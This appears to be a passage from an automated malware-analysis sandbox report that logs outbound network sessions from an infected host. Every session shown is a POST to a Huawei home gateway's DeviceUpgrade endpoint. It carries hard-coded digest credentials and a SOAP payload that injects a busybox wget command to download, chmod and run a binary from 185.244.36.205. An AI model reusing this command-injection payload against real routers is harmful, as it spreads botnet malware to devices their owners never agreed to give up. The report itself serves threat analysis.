                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2277192.168.2.1560626122.89.174.19737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466067076 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2278192.168.2.1533012181.29.90.17737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466083050 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2279192.168.2.1533670197.110.73.15637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466097116 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2280192.168.2.155686831.69.154.8737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466123104 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2281192.168.2.1535768190.238.98.3437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466150045 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2282192.168.2.1544570138.16.16.16437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466198921 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2283192.168.2.1560514122.10.132.6537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466214895 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2284192.168.2.1560182181.80.124.3437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466228008 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2285192.168.2.154676641.155.77.2737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466248989 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2286192.168.2.1543032197.184.3.6937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466264009 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
